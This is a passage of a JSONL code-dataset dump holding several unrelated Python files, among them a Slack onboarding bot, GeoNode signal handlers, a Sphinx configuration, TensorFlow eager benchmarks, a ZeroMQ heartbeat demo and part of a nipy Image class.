pt[1]), pt[2] - pt[0] + 1, pt[3] - pt[1] + 1\n color = colors[i]\n currentAxis.add_patch(plt.Rectangle(*coords, fill=False, edgecolor=color, linewidth=2))\n currentAxis.text(pt[0], pt[1], display_txt, bbox={'facecolor': color, 'alpha': 0.5})\n else:\n continue\n # j = 0\n # while detections[0,i,j,0] >= -1:\n # score = detections[0,i,j,0]\n # label_name = labels[i-1]\n # display_txt = '%s: %.2f'%(label_name, score)\n # pt = (detections[0,i,j,1:]*scale).cpu().numpy()\n # coords = (pt[0], pt[1]), pt[2]-pt[0]+1, pt[3]-pt[1]+1\n # color = colors[i]\n # currentAxis.add_patch(plt.Rectangle(*coords, fill=False, edgecolor=color, linewidth=2))\n # currentAxis.text(pt[0], pt[1], display_txt, bbox={'facecolor':color, 'alpha':0.5})\n # j+=1\n\nplt.show()\n\n\n\n\n"} {"ext": "py", "sha": "1a2f97cb5a5f68eb19cc8985425d3d2948e80c3c", "content": "# -*- coding: utf-8 -*-\n\"\"\"\nPython Slack Bot class for use with the pythOnBoarding app\n\"\"\"\nimport os\n\nfrom slackclient import SlackClient\n\n# To remember which teams have authorized your app and what tokens are\n# associated with each team, we can store this information in memory on\n# as a global object. 
When your bot is out of development, it's best to\n# save this in a more persistant memory store.\nauthed_teams = {}\n\n\nclass Bot(object):\n \"\"\" Instanciates a Bot object to handle Slack onboarding interactions.\"\"\"\n def __init__(self):\n super(Bot, self).__init__()\n self.name = \"come_back_here\"\n self.emoji = \":robot_face:\"\n # When we instantiate a new bot object, we can access the app\n # credentials we set earlier in our local development environment.\n self.oauth = {\"client_id\": os.environ.get(\"CLIENT_ID\"),\n \"client_secret\": os.environ.get(\"CLIENT_SECRET\"),\n # Scopes provide and limit permissions to what our app\n # can access. It's important to use the most restricted\n # scope that your app will need.\n \"scope\": \"users.profile:read\"}\n self.oauth\n self.verification = os.environ.get(\"VERIFICATION_TOKEN\")\n\n # NOTE: Python-slack requires a client connection to generate\n # an oauth token. We can connect to the client without authenticating\n # by passing an empty string as a token and then reinstantiating the\n # client with a valid OAuth token once we have one.\n self.client = SlackClient(\"\")\n # We'll use this dictionary to store the state of each message object.\n # In a production envrionment you'll likely want to store this more\n # persistantly in a database.\n self.messages = {}\n\n def auth(self, code):\n \"\"\"\n Authenticate with OAuth and assign correct scopes.\n Save a dictionary of authed team information in memory on the bot\n object.\n\n Parameters\n ----------\n code : str\n temporary authorization code sent by Slack to be exchanged for an\n OAuth token\n\n \"\"\"\n # After the user has authorized this app for use in their Slack team,\n # Slack returns a temporary authorization code that we'll exchange for\n # an OAuth token using the oauth.access endpoint\n auth_response = self.client.api_call(\n \"oauth.access\",\n client_id=self.oauth[\"client_id\"],\n client_secret=self.oauth[\"client_secret\"],\n code=code\n )\n # To keep track of authorized teams and their associated OAuth tokens,\n # we will save the team ID and bot tokens to the global\n # authed_teams object\n team_id = auth_response[\"team_id\"]\n authed_teams[team_id] = {\"bot_token\":\n auth_response[\"access_token\"]}\n # Then we'll reconnect to the Slack Client with the correct team's\n # bot token\n self.client = SlackClient(authed_teams[team_id][\"bot_token\"])\n\n def bring_back_user(self, user_id, channel, token):\n \"\"\"\n Create and send an onboarding welcome message to new users. Save the\n time stamp of this message on the message object for updating in the\n future.\n\n Parameters\n ----------\n team_id : str\n id of the Slack team associated with the incoming event\n user_id : str\n id of the Slack user associated with the incoming event\n\n \"\"\"\n # We'll use the message object's method to create the attachments that\n # we'll want to add to our Slack message. This method will also save\n # the attachments on the message object which we're accessing in the\n # API call below through the message object's `attachments` attribute.\n text = \"Hey... 
get back here <@\" + str(user_id) + \">\"\n self.client.api_call(\n \"chat.postMessage\",\n channel=channel,\n token=token,\n username=self.name,\n icon_emoji=self.emoji,\n text=text\n )\n self.client.api_call(\"channels.invite\", token=token, channel=channel, user=user_id)\n"} {"ext": "py", "sha": "1a2f981b3f5cd8e4906825f0c625333ed02f4993", "content": "# -*- coding: utf-8 -*-\n#########################################################################\n#\n# Copyright (C) 2016 OSGeo\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n#########################################################################\nimport errno\nimport logging\n\nfrom geoserver.layer import Layer as GsLayer\n\nfrom django.conf import settings\nfrom django.dispatch import receiver, Signal\nfrom django.forms.models import model_to_dict\nfrom django.contrib.staticfiles.templatetags import staticfiles\n\n# use different name to avoid module clash\nfrom geonode.utils import (\n is_monochromatic_image,\n json_serializer_producer)\nfrom geonode.decorators import on_ogc_backend\nfrom geonode.geoserver.helpers import (\n gs_catalog,\n ogc_server_settings)\nfrom geonode.geoserver.tasks import geoserver_create_thumbnail\nfrom geonode.layers.models import Layer\nfrom geonode.services.enumerations import CASCADED\n\nfrom . 
import BACKEND_PACKAGE\nfrom .tasks import geoserver_cascading_delete, geoserver_post_save_layers\n\nlogger = logging.getLogger(\"geonode.geoserver.signals\")\n\ngeoserver_post_save_complete = Signal(providing_args=['instance'])\n\n\ndef geoserver_delete(typename):\n # cascading_delete should only be called if\n # ogc_server_settings.BACKEND_WRITE_ENABLED == True\n if getattr(ogc_server_settings, \"BACKEND_WRITE_ENABLED\", True):\n geoserver_cascading_delete.apply_async((typename,))\n\n\n@on_ogc_backend(BACKEND_PACKAGE)\ndef geoserver_pre_delete(instance, sender, **kwargs):\n \"\"\"Removes the layer from GeoServer\n \"\"\"\n # cascading_delete should only be called if\n # ogc_server_settings.BACKEND_WRITE_ENABLED == True\n if getattr(ogc_server_settings, \"BACKEND_WRITE_ENABLED\", True):\n if instance.remote_service is None or instance.remote_service.method == CASCADED:\n if instance.alternate:\n geoserver_cascading_delete.apply_async((instance.alternate,))\n\n\n@on_ogc_backend(BACKEND_PACKAGE)\ndef geoserver_pre_save(*args, **kwargs):\n # nothing to do here, processing is pushed to post-save\n pass\n\n\n@on_ogc_backend(BACKEND_PACKAGE)\ndef geoserver_post_save(instance, sender, created, **kwargs):\n from geonode.messaging import producer\n # this is attached to various models, (ResourceBase, Document)\n # so we should select what will be handled here\n if isinstance(instance, Layer):\n instance_dict = model_to_dict(instance)\n payload = json_serializer_producer(instance_dict)\n try:\n producer.geoserver_upload_layer(payload)\n except Exception as e:\n logger.error(e)\n if getattr(settings, 'DELAYED_SECURITY_SIGNALS', False):\n instance.set_dirty_state()\n\n\n@on_ogc_backend(BACKEND_PACKAGE)\ndef geoserver_post_save_local(instance, *args, **kwargs):\n \"\"\"Send information to geoserver.\n\n The attributes sent include:\n\n * Title\n * Abstract\n * Name\n * Keywords\n * Metadata Links,\n * Point of Contact name and url\n \"\"\"\n geoserver_post_save_layers.apply_async(\n (instance.id, args, kwargs))\n\n\n@on_ogc_backend(BACKEND_PACKAGE)\ndef geoserver_pre_save_maplayer(instance, sender, **kwargs):\n # If this object was saved via fixtures,\n # do not do post processing.\n if kwargs.get('raw', False):\n return\n\n try:\n instance.local = isinstance(\n gs_catalog.get_layer(\n instance.name),\n GsLayer)\n except EnvironmentError as e:\n if e.errno == errno.ECONNREFUSED:\n msg = f'Could not connect to catalog to verify if layer {instance.name} was local'\n logger.warn(msg)\n else:\n raise e\n\n\n@on_ogc_backend(BACKEND_PACKAGE)\ndef geoserver_post_save_map(instance, sender, created, **kwargs):\n instance.set_missing_info()\n if not created:\n if not instance.thumbnail_url or \\\n instance.thumbnail_url == staticfiles.static(settings.MISSING_THUMBNAIL):\n logger.debug(f\"... Creating Thumbnail for Map [{instance.title}]\")\n # create_gs_thumbnail(instance, overwrite=False, check_bbox=True)\n geoserver_create_thumbnail.apply_async(((instance.id, False, True, )))\n\n\n@receiver(geoserver_post_save_complete)\ndef geoserver_post_save_thumbnail(sender, instance, **kwargs):\n # Creating Layer Thumbnail\n # some thumbnail generators will update thumbnail_url. If so, don't\n # immediately re-generate the thumbnail here. use layer#save(update_fields=['thumbnail_url'])\n try:\n instance.refresh_from_db()\n logger.debug(f\"... 
Creating Thumbnail for Layer {instance.title}\")\n _recreate_thumbnail = False\n if 'update_fields' in kwargs and kwargs['update_fields'] is not None and \\\n 'thumbnail_url' in kwargs['update_fields']:\n _recreate_thumbnail = True\n if not instance.thumbnail_url or \\\n instance.thumbnail_url == staticfiles.static(settings.MISSING_THUMBNAIL) or \\\n is_monochromatic_image(instance.thumbnail_url):\n _recreate_thumbnail = True\n if _recreate_thumbnail:\n geoserver_create_thumbnail.apply_async(((instance.id, False, True, )))\n else:\n logger.debug(f\"... Thumbnail for Layer {instance.title} already exists: {instance.thumbnail_url}\")\n except Exception as e:\n logger.exception(e)\n"} {"ext": "py", "sha": "1a2f982e46600735ad81eb22afcab7796311f9c0", "content": "# -*- coding: utf-8 -*-\n#\n# dist_fit documentation build configuration file, created by\n# sphinx-quickstart on Sat Nov 10 11:16:37 2012.\n#\n# This file is execfile()d with the current directory set to its containing dir.\n#\n# Note that not all possible configuration values are present in this\n# autogenerated file.\n#\n# All configuration values have a default; values that are commented out\n# serve to show the default.\nimport matplotlib\nmatplotlib.use('Agg')\nimport sys\nfrom os.path import dirname, join\n\nsys.path.insert(0, join(dirname(__file__), '../'))\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n#sys.path.insert(0, os.path.abspath('.'))\n\n# -- General configuration -----------------------------------------------------\n\n# If your documentation needs a minimal Sphinx version, state it here.\n#needs_sphinx = '1.0'\n\n# Add any Sphinx extension module names here, as strings. They can be extensions\n# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = ['matplotlib.sphinxext.only_directives',\n 'matplotlib.sphinxext.plot_directive',\n 'matplotlib.sphinxext.ipython_directive',\n 'sphinx.ext.autodoc',\n 'sphinx.ext.mathjax',\n 'sphinx.ext.autosummary']\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\n# The encoding of source files.\n#source_encoding = 'utf-8-sig'\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# General information about the project.\nproject = u'probfit'\ncopyright = u'2012, Piti Ongmongkolkul'\nautoclass_content = 'both'\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents.\n#\n# The short X.Y version.\nimport probfit.info\nversion = probfit.info.__version__\n# The full version, including alpha/beta/rc tags.\nrelease = probfit.info.__version__\n\n# The language for content autogenerated by Sphinx. 
Refer to documentation\n# for a list of supported languages.\n#language = None\n\n# There are two options for replacing |today|: either, you set today to some\n# non-false value, then it is used:\n#today = ''\n# Else, today_fmt is used as the format for a strftime call.\n#today_fmt = '%B %d, %Y'\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\nexclude_patterns = ['_build', '_themes']\n\n# The reST default role (used for this markup: `text`) to use for all documents.\n#default_role = None\n\n# If true, '()' will be appended to :func: etc. cross-reference text.\n#add_function_parentheses = True\n\n# If true, the current module name will be prepended to all description\n# unit titles (such as .. function::).\n#add_module_names = True\n\n# If true, sectionauthor and moduleauthor directives will be shown in the\n# output. They are ignored by default.\n#show_authors = False\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n# A list of ignored prefixes for module index sorting.\n#modindex_common_prefix = []\n\n\n# -- Options for HTML output ---------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\nhtml_theme = 'armstrong'\n\n\n# Theme options are theme-specific and customize the look and feel of a theme\n# further. For a list of options available for each theme, see the\n# documentation.\n#html_theme_options = {}\n\n# Add any paths that contain custom themes here, relative to this directory.\nhtml_theme_path = ['_themes', ]\n\n# The name for this set of Sphinx documents. If None, it defaults to\n# \" v documentation\".\n#html_title = None\n\n# A shorter title for the navigation bar. Default is the same as html_title.\n#html_short_title = None\n\n# The name of an image file (relative to this directory) to place at the top\n# of the sidebar.\n#html_logo = None\n\n# The name of an image file (within the static path) to use as favicon of the\n# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32\n# pixels large.\n#html_favicon = None\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\n#html_static_path = ['_static']\n\n# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,\n# using the given strftime format.\n#html_last_updated_fmt = '%b %d, %Y'\n\n# If true, SmartyPants will be used to convert quotes and dashes to\n# typographically correct entities.\n#html_use_smartypants = True\n\n# Custom sidebar templates, maps document names to template names.\n#html_sidebars = {}\n\n# Additional templates that should be rendered to pages, maps page names to\n# template names.\n#html_additional_pages = {}\n\n# If false, no module index is generated.\n#html_domain_indices = True\n\n# If false, no index is generated.\n#html_use_index = True\n\n# If true, the index is split into individual pages for each letter.\n#html_split_index = False\n\n# If true, links to the reST sources are added to the pages.\n#html_show_sourcelink = True\n\n# If true, \"Created using Sphinx\" is shown in the HTML footer. Default is True.\n#html_show_sphinx = True\n\n# If true, \"(C) Copyright ...\" is shown in the HTML footer. 
Default is True.\n#html_show_copyright = True\n\n# If true, an OpenSearch description file will be output, and all pages will\n# contain a tag referring to it. The value of this option must be the\n# base URL from which the finished HTML is served.\n#html_use_opensearch = ''\n\n# This is the file name suffix for HTML files (e.g. \".xhtml\").\n#html_file_suffix = None\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'probfitdoc'\n\n\n# -- Options for LaTeX output --------------------------------------------------\n\nlatex_elements = {\n# The paper size ('letterpaper' or 'a4paper').\n#'papersize': 'letterpaper',\n\n# The font size ('10pt', '11pt' or '12pt').\n#'pointsize': '10pt',\n\n# Additional stuff for the LaTeX preamble.\n#'preamble': '',\n}\n\n# Grouping the document tree into LaTeX files. List of tuples\n# (source start file, target name, title, author, documentclass [howto/manual]).\nlatex_documents = [\n ('index', 'probfit.tex', u'dist\\\\_fit Documentation',\n u'Piti Ongmongkolkul', 'manual'),\n]\n\n# The name of an image file (relative to this directory) to place at the top of\n# the title page.\n#latex_logo = None\n\n# For \"manual\" documents, if this is true, then toplevel headings are parts,\n# not chapters.\n#latex_use_parts = False\n\n# If true, show page references after internal links.\n#latex_show_pagerefs = False\n\n# If true, show URL addresses after external links.\n#latex_show_urls = False\n\n# Documents to append as an appendix to all manuals.\n#latex_appendices = []\n\n# If false, no module index is generated.\n#latex_domain_indices = True\n\n\n# -- Options for manual page output --------------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n ('index', 'probfit', u'probfit Documentation',\n [u'Piti Ongmongkolkul'], 1)\n]\n\n# If true, show URL addresses after external links.\n#man_show_urls = False\n\n\n# -- Options for Texinfo output ------------------------------------------------\n\n# Grouping the document tree into Texinfo files. List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [\n ('index', 'probfit', u'probfit Documentation',\n u'Piti Ongmongkolkul', 'probfit', 'Fitting Stuff',\n 'Miscellaneous'),\n]\n\n# Documents to append as an appendix to all manuals.\n#texinfo_appendices = []\n\n# If false, no module index is generated.\n#texinfo_domain_indices = True\n\n# How to display URL addresses: 'footnote', 'no', or 'inline'.\n#texinfo_show_urls = 'footnote'\n"} {"ext": "py", "sha": "1a2f998340ee16e43ab660980c196eaa7a6ef5de", "content": "\"\"\"\n\"Beacon\" (c) by Ignacio Slater M.\n\"Beacon\" is licensed under a\nCreative Commons Attribution 4.0 International License.\nYou should have received a copy of the license along with this\nwork. If not, see .\n\"\"\""} {"ext": "py", "sha": "1a2f99fe9e7de73aadee46f02c068cf4dc5697ed", "content": "# Copyright 2017 The TensorFlow Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Benchmarks for low-level eager execution primitives.\n\nPackaged as a test to ensure that this code is exercised by continuous\nintegration tests. To get numbers:\n\n bazel build -c opt :benchmarks_test &&\n ./bazel-bin/tensorflow/python/eager/benchmarks_test --iters=0\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport contextlib\nimport sys\nimport time\n\nimport numpy as np\nfrom six.moves import xrange # pylint: disable=redefined-builtin\n\nfrom tensorflow.python import pywrap_tensorflow\nfrom tensorflow.python.eager import backprop # pylint: disable=unused-import\nfrom tensorflow.python.eager import context\nfrom tensorflow.python.eager import function\nfrom tensorflow.python.eager import test\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import test_util\nfrom tensorflow.python.ops import gen_math_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import random_ops\n\nFLAGS = None\n\n\n@contextlib.contextmanager\ndef timer(label, iters=30000):\n start = time.time()\n yield xrange(iters)\n end = time.time()\n t = (end - start) * 1e6 / iters\n print(\"%-40s took %.2fus (%d iterations)\" % (label, t, iters))\n\n\ndef benchmark_create_tensor(n):\n \"\"\"Benchmark overheads of creating a Tensor object.\"\"\"\n\n def label(s):\n return \"{:20s}\".format(s)\n\n with timer(label(\"np.array([[3.0]])\"), iters=n) as iters:\n for _ in iters:\n np.array([[3.0]])\n\n ctx = context.context()\n handle = ctx._handle\n device = ctx.device_name\n # May be warmup GPU.\n ops.EagerTensor([[3.0]], context=handle, device=device)\n\n # float32\n dtype = dtypes.float32.as_datatype_enum\n three = [[3.0]]\n with timer(label(\"EagerTensor([[3.0]])\"), iters=n) as iters:\n for _ in iters:\n ops.EagerTensor(three, context=handle, device=device, dtype=dtype)\n\n np_3 = np.array([[3.0]], dtype=np.float32)\n with timer(label(\"EagerTensor(np.array([[3.0]]))\"), iters=n) as iters:\n for _ in iters:\n ops.EagerTensor(np_3, context=handle, device=device, dtype=dtype)\n\n # int32.\n # This is interesting since int32 will be kept on host memory for the GPU\n # case.\n dtype = dtypes.int32.as_datatype_enum\n three = [[3]]\n with timer(label(\"EagerTensor([[3]])\"), iters=n) as iters:\n for _ in iters:\n ops.EagerTensor(three, context=handle, device=device, dtype=dtype)\n\n np_3 = np.array([[3]], dtype=np.int32)\n with timer(label(\"EagerTensor(np.array([[3]]))\"), iters=n) as iters:\n for _ in iters:\n ops.EagerTensor(np_3, context=handle, device=device, dtype=dtype)\n\n\ndef benchmark_matmul(shape, n, use_gpu=False):\n \"\"\"Benchmark for matrix multiplication using tf.matmul.\"\"\"\n transpose_b = (shape[0] != shape[1])\n m = random_ops.random_uniform(shape)\n if 
use_gpu:\n m = m.gpu()\n # Warm up the GPU - the very first kernel invocation\n # seems to require a bunch of setup.\n math_ops.matmul(m, m, transpose_b=transpose_b)\n\n def label(s):\n return \"MatMul {}: {:30s}\".format(shape, s)\n\n if not use_gpu:\n a = m.cpu().numpy()\n b = a.T if transpose_b else a\n with timer(label(\"np.dot\"), iters=n) as iters:\n for _ in iters:\n np.dot(a, b)\n\n with timer(label(\"tf.matmul\"), iters=n) as iters:\n for _ in iters:\n math_ops.matmul(m, m, transpose_b=transpose_b)\n\n with timer(label(\"gen_math_ops.mat_mul\"), iters=n) as iters:\n for _ in iters:\n gen_math_ops._mat_mul(m, m, transpose_b=transpose_b)\n\n inputs = [m, m]\n # pylint: disable=protected-access\n ctx_handle = context.context()._handle\n # pylint: enable=protected-access\n attrs = (\"transpose_a\", False, \"transpose_b\", transpose_b, \"T\",\n m.dtype.as_datatype_enum)\n with timer(label(\"TFE_Py_Execute\"), iters=n) as iters:\n for _ in iters:\n pywrap_tensorflow.TFE_Py_Execute(ctx_handle, None, \"MatMul\",\n inputs, attrs, 1)\n\n f = function.defun(math_ops.matmul)\n with timer(label(\"defun(tf.matmul)\"), iters=n) as iters:\n for _ in iters:\n f(m, m, transpose_b=transpose_b)\n\n\ndef benchmark_multiply(shape, n, use_gpu=False):\n m = random_ops.random_uniform(shape)\n if use_gpu:\n m = m.gpu()\n # Warm up the GPU - the very first kernel invocation\n # seems to require a bunch of setup.\n _ = m * m\n\n def label(s):\n return \"Multiply {}: {:30s}\".format(shape, s)\n\n if not use_gpu:\n a = m.cpu().numpy()\n with timer(label(\"np.multiply\"), iters=n) as iters:\n for _ in iters:\n _ = a * a\n\n with timer(label(\"tf.multiply\"), iters=n) as iters:\n for _ in iters:\n _ = m * m\n\n\nclass BenchmarksTest(test_util.TensorFlowTestCase):\n\n def testBenchmarks(self):\n # This isn't actually a test, but benchmarks packaged as a test\n # so that continuous integration runs catch any breakages.\n print(context.context())\n benchmark_create_tensor(FLAGS.iters or 30000)\n benchmark_matmul([2, 2], FLAGS.iters or 30000)\n benchmark_matmul([100, 28 * 28], FLAGS.iters or 1000)\n benchmark_multiply([2], FLAGS.iters or 30000)\n\n if context.context().num_gpus() > 0:\n print(\"---- RUNNING ON GPU NOW ----\")\n with context.device(\"/device:GPU:0\"):\n benchmark_create_tensor(FLAGS.iters or 30000)\n benchmark_matmul([2, 2], FLAGS.iters or 30000, use_gpu=True)\n benchmark_matmul([100, 28 * 28], FLAGS.iters or 1000, use_gpu=True)\n benchmark_multiply([2], FLAGS.iters or 30000, use_gpu=True)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n # Default iterations to 1 to keep continuos integration test times low.\n parser.add_argument(\n \"--iters\",\n type=int,\n default=1,\n help=\"Number of iterators for each test. 
None or 0 for auto-selection\")\n FLAGS, unparsed = parser.parse_known_args()\n sys.argv = [sys.argv[0]] + unparsed\n test.main()\n"} {"ext": "py", "sha": "1a2f9caa414793b1785cf0cee2e5c50908fe5161", "content": "# -*- coding: utf-8 -*-\r\nimport os\r\n\r\nimport interface.session_events as se\r\n\r\n################################################################################\r\ndef use_GUI_windows(vip):\r\n \"\"\"Let the windows pop up that contain all the vip widgets.\r\n \"\"\"\r\n message_cwd = \"Current working directory:\\n{0}\\n\".format(os.getcwd())\r\n message_welcome = \"Welcome to the Virtual Instrument Panel!\\n\"\r\n vip.GUI_feedback([message_cwd, message_welcome])\r\n\r\n se.bn_open_GUI_feedback(vip)\r\n se.bn_open_plots_12(vip)\r\n\r\n vip.show()\r\n\r\n print \"\\n/(use_GUI_windows)\\n\"\r\n\r\ndef customize_paths(vip, DIR_PATH_data):\r\n \"\"\"Use the vip's .set method to set the path relevant to the user interface.\r\n \"\"\"\r\n ### this sets several line edits to initial sensible values\r\n FILE_PATH_session = DIR_PATH_data+os.sep+\"session_init.txt\"\r\n FILE_PATH_notes = \"K:\\\\_Computing\\\\MeasurementSoftware\\\\VIP_notes.txt\"\r\n FILE_PATH_waveform = \"C:/Users/Public/Documents/Signadyne/Examples/Waveforms/Gaussian.csv\"\r\n\r\n ### The format is: vip.set(SESSION_KEY, REPLACEMENT_DICTIONARY)\r\n ### Note that we could also save those settings to a .txt file and load it.\r\n vip.set('Results', {'DIR_PATH_results' : DIR_PATH_data})\r\n vip.set('Session', {'FILE_PATH_session' : FILE_PATH_session})\r\n vip.set('Options', {'FILE_PATH_notes' : FILE_PATH_notes})\r\n vip.set('H3344_1', {'FILE_PATH_waveform' : FILE_PATH_waveform})\r\n\r\n for index in vip._sessions_local.keys():\r\n vip.set('Session', {'F_dict_index' : str(index)}) # why is this not setting the index??/\r\n se.bn_vip_to_list_session(vip)\r\n\r\n vip.set('Session', {'F_dict_index' : 'default'})\r\n\r\n ### Unless it already exists, create a results data file directory.\r\n if not os.path.isdir(DIR_PATH_data):\r\n os.makedirs(DIR_PATH_data)\r\n ###Finally, make the Data folder the working directory for our session.\r\n os.chdir(DIR_PATH_data)\r\n\r\n print \"\\n/(customize_DIR_and_FILE_paths)\\n\"\r\n"} {"ext": "py", "sha": "1a2f9eaa432ecda298d5d7d079f83268aba0a32a", "content": "from time import sleep\nfrom threading import Event, Thread\n\nfrom zmq import (\n Context,\n HWM,\n NOBLOCK,\n Poller,\n POLLIN,\n PUB,\n PAIR,\n SUB,\n SUBSCRIBE,\n )\n\nshutdown = Event()\n\n\nclass KillThread(Exception):\n \"\"\"Raised when we want threads to die\"\"\"\n\n\nclass Heartbeat(Thread):\n\n def __init__(self, context, *args, **kw):\n self.context = context\n self.pub = self.context.socket(PAIR)\n self.pub.bind(\"inproc://#1\")\n super(Heartbeat, self).__init__(*args, **kw)\n\n def cleanup(self):\n self.pub.send(\"DIE\")\n self.pub.close()\n\n def run(self):\n try:\n x = 0\n while not shutdown.is_set():\n self.pub.send(\"BEAT.FOO.* %d, %s\" % (x + 1, self.name))\n x += 1\n sleep(1)\n finally:\n print \"%s exiting...\" % self.name\n self.cleanup()\n\n\nclass Stethoscope(Thread):\n\n def __init__(self, context, *args, **kw):\n self.context = context\n self.recv = self.context.socket(PAIR)\n self.recv.connect(\"inproc://#1\")\n\n self.pub = self.context.socket(PUB)\n self.pub.connect('tcp://localhost:7003')\n self.pub.setsockopt(HWM, 1000)\n\n self.poller = Poller()\n self.poller.register(self.recv, POLLIN)\n super(Stethoscope, self).__init__(*args, **kw)\n\n def cleanup(self):\n self.recv.close()\n 
self.pub.close()\n\n def run(self):\n try:\n while not shutdown.is_set():\n socks = dict(self.poller.poll())\n if socks.get(self.recv) == POLLIN:\n msg = self.recv.recv()\n self.pub.send(msg, flags=NOBLOCK)\n if msg == \"DIE\":\n raise KillThread\n except KillThread:\n print \"%s exiting...\" % self.name\n finally:\n self.cleanup()\n\ncontext = Context()\n\nheart = Heartbeat(context, name=\"Heartbeat Thread\")\nstethoscope = Stethoscope(context, name=\"Stethoscope Thread\")\n\n\nfor t in (heart, stethoscope):\n t.start()\n\nwhile True:\n try:\n # call thread.join to keep some control in the main thread\n while (heart.is_alive() or\n stethoscope.is_alive()):\n heart.join(timeout=0.1)\n stethoscope.join(timeout=0.1)\n\n except KeyboardInterrupt:\n shutdown.set()\n while (heart.is_alive() or\n stethoscope.is_alive()):\n heart.join(timeout=0.1)\n stethoscope.join(timeout=0.1)\n\n context.term()\n break\n"} {"ext": "py", "sha": "1a2f9f9a333372189788bbe40fb4fda6f65e8a24", "content": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\"\"\" Define the Image class and functions to work with Image instances\n\n* fromarray : create an Image instance from an ndarray (deprecated in favor of\n using the Image constructor)\n* subsample : slice an Image instance (deprecated in favor of image slicing)\n* rollaxis : roll an image axis backwards\n* synchronized_order : match coordinate systems between images\n* iter_axis : make iterator to iterate over an image axis\n* is_image : test for an object obeying the Image API\n\"\"\"\nimport warnings\nfrom copy import copy\n\nimport numpy as np\n\nfrom nibabel.onetime import setattr_on_read\n\n# These imports are used in the fromarray and subsample functions only, not in\n# Image\nfrom ..reference.coordinate_map import (AffineTransform, CoordinateSystem,\n input_axis_index)\nfrom ..reference.array_coords import ArrayCoordMap\n\n\nclass Image(object):\n \"\"\" The `Image` class provides the core object type used in nipy.\n\n An `Image` represents a volumetric brain image and provides means\n for manipulating the image data. Most functions in the image module\n operate on `Image` objects.\n\n Notes\n -----\n Images can be created through the module functions. See nipy.io for\n image IO such as ``load`` and ``save``\n\n Examples\n --------\n Load an image from disk\n\n >>> from nipy.testing import anatfile\n >>> from nipy.io.api import load_image\n >>> img = load_image(anatfile)\n\n Make an image from an array. We need to make a meaningful coordinate map\n for the image.\n\n >>> arr = np.zeros((21,64,64), dtype=np.int16)\n >>> cmap = AffineTransform('kji', 'zxy', np.eye(4))\n >>> img = Image(arr, cmap)\n \"\"\"\n _doc = {}\n\n # Dictionary to store docs for attributes that are properties. We\n # want these docs to conform with our documentation standard, but\n # they need to be passed into the property function. 
Defining\n # them separately allows us to do this without a lot of clutter\n # in the property line.\n\n ###################################################################\n #\n # Attributes\n #\n ###################################################################\n\n metadata = {}\n _doc['metadata'] = \"Dictionary containing additional information.\"\n\n coordmap = AffineTransform(CoordinateSystem('ijk'),\n CoordinateSystem('xyz'),\n np.diag([3,5,7,1]))\n _doc['coordmap'] = \"Affine transform mapping from axes coordinates to reference coordinates.\"\n\n @setattr_on_read\n def shape(self):\n return self._data.shape\n _doc['shape'] = \"Shape of data array.\"\n\n @setattr_on_read\n def ndim(self):\n return len(self._data.shape)\n _doc['ndim'] = \"Number of data dimensions.\"\n\n @setattr_on_read\n def reference(self):\n return self.coordmap.function_range\n _doc['reference'] = \"Reference coordinate system.\"\n\n @setattr_on_read\n def axes(self):\n return self.coordmap.function_domain\n _doc['axes'] = \"Axes of image.\"\n\n @setattr_on_read\n def affine(self):\n if hasattr(self.coordmap, \"affine\"):\n return self.coordmap.affine\n raise AttributeError, 'Nonlinear transform does not have an affine.'\n _doc['affine'] = \"Affine transformation if one exists.\"\n\n ###################################################################\n #\n # Properties\n #\n ###################################################################\n\n def _getheader(self):\n # data loaded from a file may have a header\n warnings.warn(\"Please don't use ``img.header``; use\"\n \"``img.metadata['header'] instead\",\n DeprecationWarning,\n stacklevel=2)\n hdr = self.metadata.get('header')\n if hdr is None:\n raise AttributeError('Image created from arrays '\n 'may not have headers.')\n return hdr\n def _setheader(self, header):\n warnings.warn(\"Please don't use ``img.header``; use\"\n \"``img.metadata['header'] instead\",\n DeprecationWarning,\n stacklevel=2)\n self.metadata['header'] = header\n _doc['header'] = \\\n 